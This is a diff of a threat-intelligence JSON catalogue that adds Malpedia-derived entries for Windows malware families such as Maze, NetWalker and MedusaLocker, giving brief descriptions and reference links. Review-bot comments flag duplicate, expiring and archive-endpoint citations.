@@ -11135,12 +20540,28 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v", + "https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger" + ], + "synonyms": [], + "type": [] + }, + "uuid": "737a73d5-40a2-4779-a84b-bdbefd1af4c9", + "value": "M00nD3V Logger" + }, + { + "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. 
The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", + "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf", "https://securelist.com/el-machete/66108/", + "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" + "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/" ], "synonyms": [ "El Machete" @@ -11154,8 +20575,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax" ], "synonyms": [], "type": [] @@ -11182,8 +20602,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372", "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" + "http://asec.ahnlab.com/1124", + "https://asec.ahnlab.com/en/19273/" ], "synonyms": [], "type": [] 
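Review bot: In the hunk `@@ -11154,8 +20575,7 @@` the MadMax entry loses its only external reference (`https://www.arbornetworks.com/blog/asert/mad-max-dga/`) and is left with just the self-referential Malpedia link, which gives consumers nothing to read about the family. If the URL was dropped because it no longer resolves, an archived copy would preserve the citation; this file already cites `web.archive.org` for other dead links, so that convention is available. The change is presumably a faithful mirror of the upstream record, so the fix would be an upstream reference update rather than a local edit.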
@@ -11191,12 +20613,70 @@ "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto", + "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", + "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/", + "https://www.youtube.com/watch?v=q8of74upT_g", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/", + "https://www.ic3.gov/media/news/2020/200929-2.pdf", + "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://lopqto.me/posts/automated-dynamic-import-resolving", + "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", + "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware", + 
"https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", + "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", + "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", + "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html", + "https://zero2auto.com/2020/05/19/netwalker-re/", + "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", + 
"https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://zengo.com/bitcoin-ransomware-detective-ucsf/" + ], + "synonyms": [ + "Koko Ransomware", + "NetWalker" + ], + "type": [] + }, + "uuid": "722aab64-a02a-40fc-8c05-6b0344fad9b8", + "value": "Mailto" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/", + "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos" ], "synonyms": [], "type": [] @@ -11210,6 +20690,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], @@ -11231,6 +20712,20 @@ "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://twitter.com/siri_urz/status/1221797493849018368" + ], + "synonyms": [], + "type": [] + }, + "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", + "value": "Makop Ransomware" + }, { "description": "", "meta": { 
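Review bot: The new Mailto entry lists the same BleepingComputer article twice, once as `.../enel-group-hit-by-ransomware-again-netwalker-demands-14-million/` and once without the trailing slash, so the refs array carries a duplicate that differs only in trailing slash. Deduplicating references after normalising trailing slashes, either in the upstream export or in the repo's cleanup step, would catch this and similar cases across the file.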
@@ -11265,7 +20760,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [ "DiskCryptor", @@ -11297,7 +20793,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf" ], "synonyms": [ "junidor", @@ -11335,6 +20832,19 @@ "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, + { + "description": "Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa", + "https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9fe92a48-6822-4ec0-b52b-d089f98590ec", + "value": "Maoloa" + }, { "description": "", "meta": { @@ -11353,6 +20863,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], 
@@ -11361,6 +20873,59 @@ "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa", + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", + "https://www.us-cert.gov/ics/advisories/ICSA-10-090-01", + "https://defintel.com/docs/Mariposa_Analysis.pdf" + ], + "synonyms": [ + "Autorun", + "Palevo", + "Rimecud" + ], + "type": [] + }, + "uuid": "6adb6fa0-1974-4d24-9c39-e76d5356cf6a", + "value": "Mariposa" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer", + "https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a85df9f-5295-4570-948a-67c2489bdd2d", + "value": "Masad Stealer" + }, + { + "description": "MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. 
This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger", + "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", + "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", + "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", + "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", + "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", + "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/", + "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", + "https://twitter.com/pancak3lullz/status/1255893734241304576" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1a09bf8-974a-4cc4-9ffd-758bed7a785e", + "value": "MASS Logger" + }, { "description": "", "meta": { @@ -11379,7 +20944,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", - "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" + "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware" ], "synonyms": [], "type": [] 
@@ -11414,6 +20981,105 @@ "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, + { + "description": "Specialized PoisonIvy Sideloader.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "feb5ac55-7b28-47aa-9e9e-5007d838c0d5", + "value": "Maudi" + }, + { + "description": "Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.\r\n\r\nActors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout). 
\r\n\r\nThe code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://www.docdroid.net/dUpPY5s/maze.pdf",
+ "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
+ "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
+ "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
+ "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ 
"https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
+ "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
+ "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://securelist.com/maze-ransomware/99137/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
+ "https://oag.ca.gov/system/files/Letter%204.pdf",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
+ 
"https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
+ "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
+ "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
+ "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ 
"https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://twitter.com/certbund/status/1192756294307995655", + "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", + "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + ], + "synonyms": [ + "ChaCha" + ], + "type": [] + }, + "uuid": "266c9377-34ef-4670-afa3-28bc0ba7f44e", + "value": "Maze" + }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { 
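Review bot: Two of the new Maze refs are not durable citations: `https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update` is the Wayback capture endpoint, so each visit requests a fresh snapshot instead of resolving to one, and the `media-exp1.licdn.com/...` link carries a signed, expiring `e=1584129600` parameter that will stop resolving. Pointing the first at a concrete snapshot (`https://web.archive.org/web/<TIMESTAMP>/https://news.cognizant.com/2020-04-18-cognizant-security-update`) and replacing or dropping the second keeps the list resolvable. The list also cites the same notes twice, as `.../malware-notes/blob/master/Ransomware/Maze.md` and `.../malware-notes/blob/master/Maze.md`; if the file was only moved, one path suffices. If these entries are regenerated from an upstream feed, the correction belongs there so the next regeneration does not revert it.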
@@ -11432,6 +21098,19 @@ "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker", + "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f7fc94c-218a-4571-85b6-5667544bf230", + "value": "MBR Locker" + }, { "description": "", "meta": { @@ -11455,9 +21134,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], - "synonyms": [], + "synonyms": [ + "GoldStamp" + ], "type": [] }, "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", 
@@ -11481,16 +21163,112 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", - "https://news.drweb.com/show/?i=10302&lng=en", - "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" + "https://news.drweb.com/show/?i=10302&lng=en" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "Medusa" + "value": "Medusa (Windows)" + }, + { + "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. 
It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", + "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", + "https://blog.talosintelligence.com/2020/04/medusalocker.html", + "https://www.cybereason.com/blog/medusalocker-ransomware", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", + "https://twitter.com/siri_urz/status/1215194488714346496?s=20", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + ], + "synonyms": [ + "AKO Doxware", + "AKO Ransomware", + "MedusaReborn" + ], + "type": [] + }, + "uuid": "77e7221f-d3db-4d13-bcde-e6d7a494f424", + "value": "MedusaLocker" + }, + { + "description": "Megacortex is a ransomware used in targeted attacks against corporations.\r\nOnce the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. 
It is used to be carried from downloaders and trojans, it has no own propagation capabilities.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://blog.malwarebytes.com/detections/ransom-megacortex/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", + "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3f09884e-dddc-4513-8720-a28fe21ab9a8", + "value": "MegaCortex" + }, + { + "description": "Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).", + "meta": { + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin", + "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "76cd241a-c265-4a33-8ce7-db2d3647b489", + "value": "MeguminTrojan" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", + "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bfebb298-66e3-4250-82e8-910b7dd8618c", + "value": "Mekotio" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3e289bb-3ac2-4f93-becd-540720501884", + "value": "Melcoz" }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", 
